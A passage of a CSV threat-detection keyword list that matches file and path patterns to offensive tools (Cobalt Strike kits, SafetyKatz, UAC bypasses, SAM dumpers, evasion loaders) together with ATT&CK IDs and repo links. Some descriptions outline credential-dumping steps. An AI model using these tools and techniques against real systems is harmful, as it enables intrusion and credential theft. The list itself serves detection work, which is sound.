TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","5","1","89","12","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z" +"*/S3cur3Th1sSh1t/*","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","84","15","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z" +"*/S3Scanner.git*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*/s4n7h0/NSE*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" 
+"*/S4UTomato.git*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*/s7-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/saefko.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" 
+"*/Safer_PoC_CVE*","offensive_tool_keyword","POC","A Safer PoC for CVE-2022-22965 (Spring4Shell)","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/colincowie/Safer_PoC_CVE-2022-22965","1","1","N/A","N/A","1","45","7","2022-05-27T12:56:40Z","2022-03-31T16:58:56Z" +"*/SafetyKatz.git*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" +"*/sam_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/samba-vuln-cve-2012-1182.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/samdump.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*/samdump2*","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","10","6","N/A","N/A","N/A","N/A" +"*/samruser.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/sap_default.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/sc_inject/inject/*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" +"*/scan4all.git*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/scan4all/lib/api*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - 
TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/scan4all/lib/util*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/scanner/discovery*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/scanner/kerberos*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/scanner/pcanywhere*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/scanner/portscan*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/scanner/winrm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/scannerPort.go*","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","1","N/A","N/A","1","72","18","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" +"*/scan-network.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/Scans/servers_all_smb*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/ScareCrow -I *","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","0","N/A","10","10","296","51","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" +"*/sccmhunter*","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z" +"*/schtasksenum/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/scmuacbypass.cpp*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" +"*/scmuacbypass.exe*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" +"*/SCMUACBypass.git*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" +"*/SCMUACBypass/*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" +"*/ScreenshotInject*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*/scripts/xor.py*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless 
Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*/ScriptSentry.git*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*/ScriptSentry.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*/ScriptSentry.psd1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*/ScriptSentry.psm1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*/ScRunHex.py*","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","177","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" +"*/scshell*","offensive_tool_keyword","scshell","SCShell is a fileless lateral movement tool that relies on ChangeServiceConfigA to run commands. The beauty of this tool is that it does not perform authentication against SMB. Everything is performed over DCERPC.The utility can be used remotely WITHOUT registering a service or creating a service. 
It also doesn't have to drop any file on the remote system* (Depend on the technique used to execute)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*/scshell.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/scuffy.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/searchsploit*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z"
+"*/Seatbelt.txt*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z"
+"*/Seatbelt/Commands*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z"
+"*/SeBackupPrivilege.md*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1573","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z"
+"*/secinject.c*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z"
